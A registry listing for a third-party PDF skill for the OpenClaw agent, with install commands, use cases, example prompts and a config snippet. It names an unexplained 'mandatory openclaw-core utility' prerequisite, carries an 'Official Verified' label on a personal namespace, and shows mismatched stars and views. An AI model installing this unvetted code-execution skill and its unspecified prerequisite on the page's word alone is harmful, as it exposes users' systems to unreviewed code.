ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified file management Safety 3/5

pdf

Work with PDF files - extract text for analysis, get metadata, merge/split documents, convert formats, search content, and OCR scanned documents. Use when you need to read, analyze, or manipulate PDF files.

Why use this skill?

Master your document workflow with the OpenClaw PDF skill. Effortlessly extract text, merge files, convert formats, and run OCR directly through your AI agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/pdf-1wso5
Or

What This Skill Does

The PDF skill for OpenClaw is a comprehensive toolset designed to give the AI agent the capability to interact with, extract data from, and manipulate PDF documents. By leveraging core utilities like poppler-utils and internal system commands, it transforms static PDF files into machine-readable text or images. Whether you need to scrape text from a scanned legal document, convert multiple files into a single report, or retrieve metadata like authorship and page counts, this skill provides the necessary command-line interface hooks to perform these tasks accurately within the agent's environment.

Installation

To use this skill, ensure you have the OpenClaw environment properly initialized. First, install the required base package: clawhub install openclaw/skills/skills/hightower6eu/pdf-1wso5. Beyond the base installation, you must ensure the system dependencies are present: on Linux, use sudo apt-get install -y poppler-utils; on macOS, use brew install poppler; on Windows, use choco install poppler. For advanced features such as OCR, ensure pip install ocrmypdf is run. Note that the mandatory openclaw-core utility must be configured according to your OS guidelines before any commands will execute.

Use Cases

  • Automating data extraction from invoices or reports for database ingestion.
  • Converting bulk documents into image sets for visual inspection workflows.
  • Preparing documents for archiving by merging multiple PDF files into one.
  • Auditing document metadata to verify creation dates or authorship security.
  • Converting image-based scanned documents into searchable text formats using OCR.

Example Prompts

  • "Please extract the full text from the 'quarterly_report.pdf' file and save it as a text file named 'extracted_data.txt'."
  • "I need to combine all the invoice PDF files in this folder into one single document called 'combined_invoices.pdf'."
  • "Can you generate a 300 DPI PNG image of the first page of 'manual.pdf' so I can use it as a cover thumbnail?"

Tips & Limitations

Always verify that the document is not password-protected, as these commands may fail without proper decryption headers. For scanned documents, remember that standard text extraction will return empty results; you must utilize the OCR functionality to generate text layers. Keep in mind that heavy processing, such as high-DPI image conversion, can be CPU-intensive; perform these on individual pages rather than large multi-hundred-page documents to optimize performance. Finally, ensure all file paths are correctly quoted in your environment to avoid issues with spaces or special characters in filenames.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-pdf-1wso5": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#pdf-processing#document-management#ocr#automation
Safety Score: 3/5

Flags: file-write, file-read, code-execution